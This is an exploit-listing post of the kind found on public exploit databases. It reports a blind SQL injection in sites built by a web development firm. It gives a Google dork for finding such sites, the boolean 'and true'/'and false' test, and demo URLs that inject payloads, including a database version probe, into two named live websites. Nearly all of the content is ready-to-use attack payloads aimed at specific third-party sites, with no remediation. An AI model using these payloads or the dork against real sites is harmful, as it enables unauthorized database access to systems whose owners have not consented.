********************************************************* #Exploit Title: Positive E Solutions Inc - Blind Sql Injection Vulnerability #Date: 2024-11-12 #Exploit Author: Behrouz Mansoori #Google Dork: "Web Development by Positive E Solutions Inc" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://chemaquascience.ca/product-details.php?id=17%20and%20true-- * https://chemaquascience.ca/product-details.php?id=17%20and%20false-- * https://chemaquascience.ca/product-details.php?id=17%20and%20substring(@@version,1,1)=8-- ### Demo 2: * https://lowryassociates.ca/product-details.php?id=50%20and%20true-- * https://lowryassociates.ca/product-details.php?id=50%20and%20false-- * https://lowryassociates.ca/product-details.php?id=50%20and%20substring(@@version,1,1)=8-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************